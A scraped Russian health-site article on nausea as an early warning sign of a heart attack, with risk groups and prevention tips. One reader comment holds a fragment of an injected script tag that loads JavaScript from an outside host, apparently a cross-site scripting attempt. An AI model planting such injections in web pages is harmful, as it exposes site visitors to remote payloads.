Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Симптомы, которые нельзя ...  >>  Симптомы, которые нельзя пропустить. Тошнота.
 
Обратная связь
 

Симптомы, которые нельзя пропустить. Тошнота.

Размер шрифта
23 февраля 2011 00:01
  • google_analytics: false
  • Нравится

Мучительная тошнота, которая не отпускает несколько дней, в сочетании с общей слабостью организма не предвещает ничего хорошего. Это один из симптомов инфаркта миокарда. Однако если не игнорировать его, а быстро обратиться за помощью – можно спасти свое сердце.

М и Ж

Природа распорядилась так, что до поры до времени инфаркт миокарда – больше мужская проблема, нежели женская: в возрасте до 40-50 лет сильная половина человечества в 3-4 раза чаще слабой страдает от этой болезни. Все меняется, когда у дам начинается период менопаузы.

Именно «женские» гормоны хранят женщин от болезни, но в зрелом возрасте гормоны уже не вырабатываются в том количестве, которое необходимо для защиты сердца и сосудов. Поэтому с наступлением «осени жизни» шансы женщин получить коварный недуг резко возрастают, а после 50 лет, риски мужчин и женщин пасть жертвами инфаркта миокарда уравниваются.

Инфаркт миокарда меняет жизнь человека. В худшую сторону. После него могут стать недоступными простые жизненные радости, такие как, например, спорт или секс. И это далеко не худший финал. При этом, чем раньше обратиться за помощью – тем больше вероятность избежать грустных последствий. Однако, чтобы разобраться, когда нужно не медлить и обращаться за помощью, требуется разобраться, что такое инфаркт.

Ах, сердце!

Миокард – это сердечная мышца. Так ее называют в медицине. Для правильной и полноценной работы этой мышце постоянно требуются определенный набор питательных веществ и кислород, которые приходят с кровью. Если в работе кровеносной системы происходят серьезные сбои, и кровоснабжение какого-то из участков сердца останавливается более, чем на 15-20 минут, участок умирает. Этот процесс и называется инфаркт миокарда. Во время инфаркта человек чувствует сильные боли в груди, которые могут отдавать в плечо или в руку, они не проходят даже поле того, как был принят нитроглицерин.

Чем дольше не оказывается помощь – тем большая часть сердца страдает. После таких потрясений ткани не восстанавливаются, и «пламенный мотор» уже не может работать на полную мощность. Чтобы не перегружать его приходится отказывать себе буквально во всем. Поэтому от времени, через которое вы обратитесь за помощью, после появления болей в области груди, зависит очень многое.

Инфаркт можно предотвратить, если тщательно прислушиваться к себе. Иногда симптомы надвигающегося приступа появляются за несколько дней. Одним из таких симптомов является тошнота. Рядом с сердцем располагаются многие органы, желудок – один из них. В преддверии инфаркта сердце отправляет «сигналы бедствия» в мозг, но тот может неправильно понять их, перепутать и послать свой ответ в соседний орган. В результате, когда не все в порядке с сердечной мышцей, у человека могут возникнуть проблемы с желудком.

Однако, не стоит пугаться простой тошноты. Для того, чтобы считать ее предвестником недуга, ее должны сопровождать еще как минимум один или два из нижеописанных симптомов:

  • общая слабость организма, ощущение сильного утомления, даже если в последнее время не приходилось сильно напрягаться
  • нехватка дыхания
  • боли в шее и плече: если они появились при сильной тошноте, необходимо как можно скорее обратиться за помощь, как правило, это говорит о том, что времени совсем мало
  • потеря сознания
  • бледность кожи
  • липкий холодный пот

Симптомы, описанные выше, могут встречаться и при других заболеваниях, но если вы входите в группу риска – лучше перестраховаться и тут же вызвать неоложную помощь.

Группа риска

Меры профилактики
Инфаркт миокарда можно избежать, если:
  • отказаться от вредных привычек
  • вести активный образ жизни (двигаться хотя бы по часу в день)
  • начать правильно питаться

С особым трепетом к своему здоровью стоит относиться тем, кто находится в группе риска. Больше всего предрасположены к инфаркту, люди с сахарным диабетом, у них он чаще других происходит в нетипичной форме – то есть без болей в груди. Все симптомы ограничиваются лишь тошнотой и еще несколькими из признаков, описанных выше.

Люди, чей вес более чем на 10 кг превышает норму, также составляют значительную долю жертв инфаркта. У них велик риск образования холестериновых бляшек в сосудах, что может серьезно нарушить кровоток и спровоцировать приступ.

Большую бдительность нужно проявлять женщинам, которые курят после 50 лет. Если вы выкуриваете от 1 до 14 сигарет в день – риск инфаркта повышается в 2 раза. Если за сутки у вас уходит пачка – риск возрастает в 3,7 раза.

Далее в группе риска девушки, родители которых перенесли инфаркт в раннем возрасте (до 30-40 лет). В этом случае, врачи считают, что заболевание можно унаследовать.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:20

Комментарий удален за нарушение Правил общения

Статьи

       
Симптомы, которые нельзя пропустить. Тошнота.   Новое о чае. Дополнительные аргументы в пользу чаепития   Что с вами делает злость?   Как пережить жару дома  
22 июня 2013Грецкие орехи спасут от инфаркта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
5 симптомов, которые спасут вашу жизнь
6 признаков, что у вас инфаркт прямо сейчас
7 ранних признаков инфаркта

Тесты

Будет ли у вас инфаркт?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.